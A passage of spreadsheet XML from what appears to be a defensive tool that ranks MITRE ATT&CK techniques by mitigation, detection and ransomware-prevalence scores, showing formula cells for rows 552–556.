        <f t="array" ref="AF552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC552)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG552" s="25">
        <f>IF(AF552="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH552" s="25" t="str" cm="1">
        <f t="array" ref="AH552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI552" s="25">
        <f>IF(AH552="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ552" s="25" t="str" cm="1">
        <f t="array" ref="AJ552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK552" s="25">
        <f>IF(AJ552="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL552" s="25" t="str" cm="1">
        <f t="array" ref="AL552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM552" s="25">
        <f>IF(AL552="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN552" s="60">
        <v>0</v>
      </c>
      <c r="AO552" s="51">
        <v>0</v>
      </c>
      <c r="AP552" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ552" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR552" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS552" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT552" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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53" spans="1:47" ht="32.1">
      <c r="A553" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B553" s="25">
        <f>SUM(H553,M553,V553)*(1+SUM(AE553,AG553,AI553,AK553,AM553))</f>
        <v>0.05</v>
      </c>
      <c r="C553" s="25" t="s">
        <v>1920</v>
      </c>
      <c r="D553" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E553" s="25" t="s">
        <v>1921</v>
      </c>
      <c r="F553" s="51">
        <v>0</v>
      </c>
      <c r="G553" s="51">
        <v>1</v>
      </c>
      <c r="H553" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I553">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J553">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K553">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L553">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M553" s="25">
        <v>0</v>
      </c>
      <c r="N553" s="51">
        <v>0</v>
      </c>
      <c r="O553" s="51">
        <v>0</v>
      </c>
      <c r="P553" s="51">
        <v>0</v>
      </c>
      <c r="Q553" s="51">
        <v>0</v>
      </c>
      <c r="R553" s="51"/>
      <c r="S553" s="51">
        <v>0</v>
      </c>
      <c r="T553" s="51"/>
      <c r="U553" s="51">
        <v>0</v>
      </c>
      <c r="V553" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W553">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X553">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y553">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z553">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA553">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB553">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC553" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD553" s="25" t="str" cm="1">
        <f t="array" ref="AD553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE553" s="25">
        <f>IF(AD553="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF553" s="25" t="str" cm="1">
        <f t="array" ref="AF553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC553)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG553" s="25">
        <f>IF(AF553="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH553" s="25" t="str" cm="1">
        <f t="array" ref="AH553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI553" s="25">
        <f>IF(AH553="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ553" s="25" t="str" cm="1">
        <f t="array" ref="AJ553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK553" s="25">
        <f>IF(AJ553="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL553" s="25" t="str" cm="1">
        <f t="array" ref="AL553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM553" s="25">
        <f>IF(AL553="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN553" s="60">
        <v>0</v>
      </c>
      <c r="AO553" s="51">
        <v>0</v>
      </c>
      <c r="AP553" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ553" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR553" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS553" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT553" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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54" spans="1:47" ht="32.1">
      <c r="A554" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B554" s="25">
        <f>SUM(H554,M554,V554)*(1+SUM(AE554,AG554,AI554,AK554,AM554))</f>
        <v>0.05</v>
      </c>
      <c r="C554" s="25" t="s">
        <v>1922</v>
      </c>
      <c r="D554" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E554" s="25" t="s">
        <v>1923</v>
      </c>
      <c r="F554" s="51">
        <v>0</v>
      </c>
      <c r="G554" s="51">
        <v>1</v>
      </c>
      <c r="H554" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I554">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J554">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K554">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L554">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M554" s="25">
        <v>0</v>
      </c>
      <c r="N554" s="51">
        <v>0</v>
      </c>
      <c r="O554" s="51">
        <v>0</v>
      </c>
      <c r="P554" s="51">
        <v>0</v>
      </c>
      <c r="Q554" s="51">
        <v>0</v>
      </c>
      <c r="R554" s="51"/>
      <c r="S554" s="51">
        <v>0</v>
      </c>
      <c r="T554" s="51"/>
      <c r="U554" s="51">
        <v>0</v>
      </c>
      <c r="V554" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W554">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X554">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y554">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z554">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA554">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB554">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC554" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD554" s="25" t="str" cm="1">
        <f t="array" ref="AD554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE554" s="25">
        <f>IF(AD554="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF554" s="25" t="str" cm="1">
        <f t="array" ref="AF554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC554)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG554" s="25">
        <f>IF(AF554="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH554" s="25" t="str" cm="1">
        <f t="array" ref="AH554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI554" s="25">
        <f>IF(AH554="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ554" s="25" t="str" cm="1">
        <f t="array" ref="AJ554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK554" s="25">
        <f>IF(AJ554="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL554" s="25" t="str" cm="1">
        <f t="array" ref="AL554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM554" s="25">
        <f>IF(AL554="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN554" s="52">
        <v>0</v>
      </c>
      <c r="AO554" s="51">
        <v>0</v>
      </c>
      <c r="AP554" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ554" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR554" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS554" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT554" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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55" spans="1:47">
      <c r="A555" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B555" s="25">
        <f>SUM(H555,M555,V555)*(1+SUM(AE555,AG555,AI555,AK555,AM555))</f>
        <v>0.05</v>
      </c>
      <c r="C555" s="25" t="s">
        <v>1924</v>
      </c>
      <c r="D555" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E555" s="25" t="s">
        <v>1925</v>
      </c>
      <c r="F555" s="51">
        <v>0</v>
      </c>
      <c r="G555" s="51">
        <v>1</v>
      </c>
      <c r="H555" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I555">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J555">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K555">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L555">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M555" s="25">
        <v>0</v>
      </c>
      <c r="N555" s="51">
        <v>0</v>
      </c>
      <c r="O555" s="51">
        <v>0</v>
      </c>
      <c r="P555" s="51">
        <v>0</v>
      </c>
      <c r="Q555" s="51">
        <v>0</v>
      </c>
      <c r="R555" s="51"/>
      <c r="S555" s="51">
        <v>0</v>
      </c>
      <c r="T555" s="51"/>
      <c r="U555" s="51">
        <v>0</v>
      </c>
      <c r="V555" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W555">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X555">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y555">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z555">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA555">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB555">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC555" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD555" s="25" t="str" cm="1">
        <f t="array" ref="AD555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE555" s="25">
        <f>IF(AD555="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF555" s="25" t="str" cm="1">
        <f t="array" ref="AF555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG555" s="25">
        <f>IF(AF555="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH555" s="25" t="str" cm="1">
        <f t="array" ref="AH555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI555" s="25">
        <f>IF(AH555="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ555" s="25" t="str" cm="1">
        <f t="array" ref="AJ555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK555" s="25">
        <f>IF(AJ555="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL555" s="25" t="str" cm="1">
        <f t="array" ref="AL555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM555" s="25">
        <f>IF(AL555="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN555" s="60">
        <v>0</v>
      </c>
      <c r="AO555" s="51">
        <v>0</v>
      </c>
      <c r="AP555" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ555" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR555" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS555" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT555" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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56" spans="1:47">
      <c r="A556" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B556" s="25">
        <f>SUM(H556,M556,V556)*(1+SUM(AE556,AG556,AI556,AK556,AM556))</f>
        <v>0.05</v>
      </c>
      <c r="C556" s="25" t="s">
        <v>1926</v>
      </c>
      <c r="D556" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E556" s="25" t="s">
        <v>1927</v>
      </c>
      <c r="F556" s="51">
        <v>0</v>
      </c>
      <c r="G556" s="51">
        <v>1</v>
      </c>
      <c r="H556" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I556">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J556">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K556">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L556">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M556" s="25">
        <v>0</v>
      </c>
      <c r="N556" s="51">
        <v>0</v>
      </c>
      <c r="O556" s="51">
        <v>0</v>
      </c>
      <c r="P556" s="51">
        <v>0</v>
      </c>
      <c r="Q556" s="51">
        <v>0</v>
      </c>
      <c r="R556" s="51"/>
      <c r="S556" s="51">
        <v>0</v>
      </c>
      <c r="T556" s="51"/>
      <c r="U556" s="51">
        <v>0</v>
      </c>
      <c r="V556" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W556">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X556">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y556">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z556">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA556">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB556">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC556" s="29"/>
      <c r="AD556" s="25" t="str" cm="1">
        <f t="array" ref="AD556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE556" s="25">
        <f>IF(AD556="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF556" s="25" t="str" cm="1">
        <f t="array" ref="AF556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG556" s="25">
        <f>IF(AF556="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH556" s="25" t="str" cm="1">
        <f t="array" ref="AH556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI556" s="25">
        <f>IF(AH556="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ556" s="25" t="str" cm="1">
        <f t="array" ref="AJ556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK556" s="25">
        <f>IF(AJ556="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL556" s="25" t="str" cm="1">
        <f t="array" ref="AL556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM556" s="25">
        <f>IF(AL556="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN556" s="52">
        <v>0</v>
      </c>
      <c r="AO556" s="51">
        <v>0</v>
      </c>
      <c r="AP556" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ556" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR556" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS556" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT556" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
